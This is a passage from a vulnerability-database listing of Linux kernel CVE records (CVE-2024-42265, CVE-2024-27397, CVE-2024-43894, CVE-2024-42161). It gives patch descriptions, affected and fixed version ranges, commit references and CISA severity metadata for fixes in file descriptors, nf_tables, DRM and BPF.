            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/file.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ed42e8ff509d2a61c6642d1825032072dab79f26",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "41a6c31df77bd8e050136b0a200b537da9e1084a",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "08775b3d6ed117cf4518754ec7300ee42b6a5368",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "3f480493550b6a23d3a65d095d6569d4a7f56a0f",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "5db999fff545b924b24c9afd368ef5c17279b176",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "da72e783afd27d9f487836b2e6738146c0edd149",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "1171ceccabfd596ca370c5d2cbb47d110c3f2fe1",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            },
            {
              "lessThan": "8aa37bde1a7b645816cda8b80df4753ecf172bf1",
              "status": "affected",
              "version": "8280d16172243702ed43432f826ca6130edb4086",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/file.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.104",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.45",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.104",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.45",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.4",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nprotect the fetch of -\u003efd[fd] in do_dup2() from mispredictions\n\nboth callers have verified that fd is not greater than -\u003emax_fds;\nhowever, misprediction might end up with\n        tofree = fdt-\u003efd[fd];\nbeing speculatively executed.  That\u0027s wrong for the same reasons\nwhy it\u0027s wrong in close_fd()/file_close_fd_locked(); the same\nsolution applies - array_index_nospec(fd, fdt-\u003emax_fds) could differ\nfrom fd only in case of speculative execution on mispredicted path."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:09.824Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ed42e8ff509d2a61c6642d1825032072dab79f26"
        },
        {
          "url": "https://git.kernel.org/stable/c/41a6c31df77bd8e050136b0a200b537da9e1084a"
        },
        {
          "url": "https://git.kernel.org/stable/c/08775b3d6ed117cf4518754ec7300ee42b6a5368"
        },
        {
          "url": "https://git.kernel.org/stable/c/3f480493550b6a23d3a65d095d6569d4a7f56a0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/5db999fff545b924b24c9afd368ef5c17279b176"
        },
        {
          "url": "https://git.kernel.org/stable/c/da72e783afd27d9f487836b2e6738146c0edd149"
        },
        {
          "url": "https://git.kernel.org/stable/c/1171ceccabfd596ca370c5d2cbb47d110c3f2fe1"
        },
        {
          "url": "https://git.kernel.org/stable/c/8aa37bde1a7b645816cda8b80df4753ecf172bf1"
        }
      ],
      "title": "protect the fetch of -\u003efd[fd] in do_dup2() from mispredictions",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42265",
    "datePublished": "2024-08-17T08:54:21.636Z",
    "dateReserved": "2024-07-30T07:40:12.259Z",
    "dateUpdated": "2026-01-05T10:52:09.824Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27397 (GCVE-0-2024-27397)

Vulnerability from cvelistv5 – Published: 2024-05-09 16:37 – Updated: 2025-11-03 21:54

Title

netfilter: nf_tables: use timestamp to check for set element timeout

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: use timestamp to check for set element timeout Add a timestamp field at the beginning of the transaction, store it in the nftables per-netns area. Update set backend .insert, .deactivate and sync gc path to use the timestamp, this avoids that an element expires while control plane transaction is still unfinished. .lookup and .update, which are used from packet path, still use the current time to check if the element has expired. And .get path and dump also since this runs lockless under rcu read size lock. Then, there is async gc which also needs to check the current time since it runs asynchronously from a workqueue.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f8dfda798650241c1…
	https://git.kernel.org/stable/c/eaf1a29ea5d7dba8e…
	https://git.kernel.org/stable/c/7b17de2a71e56c103…
	https://git.kernel.org/stable/c/0d40e8cb1d1f56a99…
	https://git.kernel.org/stable/c/b45176b869673417a…
	https://git.kernel.org/stable/c/7fa2e2960fff8322c…
	https://git.kernel.org/stable/c/383182db8d58c4237…
	https://git.kernel.org/stable/c/7395dfacfff65e993…

Impacted products

Vendor

Product

Version

Linux

Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < f8dfda798650241c1692058713ca4fef8e429061 (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < eaf1a29ea5d7dba8e84e9e9f3b3f47d0cd540bfe (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < 7b17de2a71e56c10335b565cc7ad238e6d984379 (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < 0d40e8cb1d1f56a994cdd2e015af622fdca9ed4d (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < b45176b869673417ace338b87cf9cdb66e2eeb01 (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < 7fa2e2960fff8322ce2ded57b5f8e9cbc450b967 (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < 383182db8d58c4237772ba0764cded4938a235c3 (git)
Affected: c3e1b005ed1cc068fc9d454a6e745830d55d251d , < 7395dfacfff65e9938ac0889dafa1ab01e987d15 (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.84 , ≤ 6.6.* (semver)
Unaffected: 6.7.5 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27397",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:39:42.529200Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:44:15.867Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:54:14.579Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b45176b869673417ace338b87cf9cdb66e2eeb01"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/383182db8d58c4237772ba0764cded4938a235c3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7395dfacfff65e9938ac0889dafa1ab01e987d15"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/net/netfilter/nf_tables.h",
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_hash.c",
            "net/netfilter/nft_set_pipapo.c",
            "net/netfilter/nft_set_rbtree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f8dfda798650241c1692058713ca4fef8e429061",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "eaf1a29ea5d7dba8e84e9e9f3b3f47d0cd540bfe",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "7b17de2a71e56c10335b565cc7ad238e6d984379",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "0d40e8cb1d1f56a994cdd2e015af622fdca9ed4d",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "b45176b869673417ace338b87cf9cdb66e2eeb01",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "7fa2e2960fff8322ce2ded57b5f8e9cbc450b967",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "383182db8d58c4237772ba0764cded4938a235c3",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            },
            {
              "lessThan": "7395dfacfff65e9938ac0889dafa1ab01e987d15",
              "status": "affected",
              "version": "c3e1b005ed1cc068fc9d454a6e745830d55d251d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/net/netfilter/nf_tables.h",
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_hash.c",
            "net/netfilter/nft_set_pipapo.c",
            "net/netfilter/nft_set_rbtree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.84",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.5",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: use timestamp to check for set element timeout\n\nAdd a timestamp field at the beginning of the transaction, store it\nin the nftables per-netns area.\n\nUpdate set backend .insert, .deactivate and sync gc path to use the\ntimestamp, this avoids that an element expires while control plane\ntransaction is still unfinished.\n\n.lookup and .update, which are used from packet path, still use the\ncurrent time to check if the element has expired. And .get path and dump\nalso since this runs lockless under rcu read size lock. Then, there is\nasync gc which also needs to check the current time since it runs\nasynchronously from a workqueue."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:04:07.736Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f8dfda798650241c1692058713ca4fef8e429061"
        },
        {
          "url": "https://git.kernel.org/stable/c/eaf1a29ea5d7dba8e84e9e9f3b3f47d0cd540bfe"
        },
        {
          "url": "https://git.kernel.org/stable/c/7b17de2a71e56c10335b565cc7ad238e6d984379"
        },
        {
          "url": "https://git.kernel.org/stable/c/0d40e8cb1d1f56a994cdd2e015af622fdca9ed4d"
        },
        {
          "url": "https://git.kernel.org/stable/c/b45176b869673417ace338b87cf9cdb66e2eeb01"
        },
        {
          "url": "https://git.kernel.org/stable/c/7fa2e2960fff8322ce2ded57b5f8e9cbc450b967"
        },
        {
          "url": "https://git.kernel.org/stable/c/383182db8d58c4237772ba0764cded4938a235c3"
        },
        {
          "url": "https://git.kernel.org/stable/c/7395dfacfff65e9938ac0889dafa1ab01e987d15"
        }
      ],
      "title": "netfilter: nf_tables: use timestamp to check for set element timeout",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27397",
    "datePublished": "2024-05-09T16:37:22.463Z",
    "dateReserved": "2024-02-25T13:47:42.677Z",
    "dateUpdated": "2025-11-03T21:54:14.579Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43894 (GCVE-0-2024-43894)

Vulnerability from cvelistv5 – Published: 2024-08-26 10:10 – Updated: 2025-11-03 22:06

Title

drm/client: fix null pointer dereference in drm_client_modeset_probe

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/client: fix null pointer dereference in drm_client_modeset_probe In drm_client_modeset_probe(), the return value of drm_mode_duplicate() is assigned to modeset->mode, which will lead to a possible NULL pointer dereference on failure of drm_mode_duplicate(). Add a check to avoid npd.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/24ddda932c43ffe15…
	https://git.kernel.org/stable/c/5291d4f73452c91e8…
	https://git.kernel.org/stable/c/c763dfe09425152b6…
	https://git.kernel.org/stable/c/d64847c383100423a…
	https://git.kernel.org/stable/c/d64fc94f7bb24fc2b…
	https://git.kernel.org/stable/c/612cae53e99ce32a5…
	https://git.kernel.org/stable/c/113fd6372a5bb3689…

Impacted products

Vendor

Product

Version

Linux

Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < 24ddda932c43ffe156c7f3c568bed85131c63ae6 (git)
Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < 5291d4f73452c91e8a11f71207617e3e234d418e (git)
Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < c763dfe09425152b6bb0e348900a637c62c2ce52 (git)
Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < d64847c383100423aecb6ac5f18be5f4316d9d62 (git)
Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < d64fc94f7bb24fc2be0d6bd5df8df926da461a6d (git)
Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < 612cae53e99ce32a58cb821b3b67199eb6e92dff (git)
Affected: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 , < 113fd6372a5bb3689aba8ef5b8a265ed1529a78f (git)

Linux

Affected: 5.3
Unaffected: 0 , < 5.3 (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43894",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:29:12.803561Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:08.646Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:06:57.078Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_client_modeset.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "24ddda932c43ffe156c7f3c568bed85131c63ae6",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            },
            {
              "lessThan": "5291d4f73452c91e8a11f71207617e3e234d418e",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            },
            {
              "lessThan": "c763dfe09425152b6bb0e348900a637c62c2ce52",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            },
            {
              "lessThan": "d64847c383100423aecb6ac5f18be5f4316d9d62",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            },
            {
              "lessThan": "d64fc94f7bb24fc2be0d6bd5df8df926da461a6d",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            },
            {
              "lessThan": "612cae53e99ce32a58cb821b3b67199eb6e92dff",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            },
            {
              "lessThan": "113fd6372a5bb3689aba8ef5b8a265ed1529a78f",
              "status": "affected",
              "version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_client_modeset.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.3"
            },
            {
              "lessThan": "5.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: fix null pointer dereference in drm_client_modeset_probe\n\nIn drm_client_modeset_probe(), the return value of drm_mode_duplicate() is\nassigned to modeset-\u003emode, which will lead to a possible NULL pointer\ndereference on failure of drm_mode_duplicate(). Add a check to avoid npd."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:28:44.470Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/24ddda932c43ffe156c7f3c568bed85131c63ae6"
        },
        {
          "url": "https://git.kernel.org/stable/c/5291d4f73452c91e8a11f71207617e3e234d418e"
        },
        {
          "url": "https://git.kernel.org/stable/c/c763dfe09425152b6bb0e348900a637c62c2ce52"
        },
        {
          "url": "https://git.kernel.org/stable/c/d64847c383100423aecb6ac5f18be5f4316d9d62"
        },
        {
          "url": "https://git.kernel.org/stable/c/d64fc94f7bb24fc2be0d6bd5df8df926da461a6d"
        },
        {
          "url": "https://git.kernel.org/stable/c/612cae53e99ce32a58cb821b3b67199eb6e92dff"
        },
        {
          "url": "https://git.kernel.org/stable/c/113fd6372a5bb3689aba8ef5b8a265ed1529a78f"
        }
      ],
      "title": "drm/client: fix null pointer dereference in drm_client_modeset_probe",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43894",
    "datePublished": "2024-08-26T10:10:49.340Z",
    "dateReserved": "2024-08-17T09:11:59.290Z",
    "dateUpdated": "2025-11-03T22:06:57.078Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42161 (GCVE-0-2024-42161)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:47 – Updated: 2025-11-03 22:02

Title

bpf: Avoid uninitialized value in BPF_CORE_READ_BITFIELD

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Avoid uninitialized value in BPF_CORE_READ_BITFIELD [Changes from V1: - Use a default branch in the switch statement to initialize `val'.] GCC warns that `val' may be used uninitialized in the BPF_CRE_READ_BITFIELD macro, defined in bpf_core_read.h as: [...] unsigned long long val; \ [...] \ switch (__CORE_RELO(s, field, BYTE_SIZE)) { \ case 1: val = *(const unsigned char *)p; break; \ case 2: val = *(const unsigned short *)p; break; \ case 4: val = *(const unsigned int *)p; break; \ case 8: val = *(const unsigned long long *)p; break; \ } \ [...] val; \ } \ This patch adds a default entry in the switch statement that sets `val' to zero in order to avoid the warning, and random values to be used in case __builtin_preserve_field_info returns unexpected values for BPF_FIELD_BYTE_SIZE. Tested in bpf-next master. No regressions.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b694989bb13ed5f16…
	https://git.kernel.org/stable/c/3364c2ed1c2419898…
	https://git.kernel.org/stable/c/a21d76bd0b0d39518…
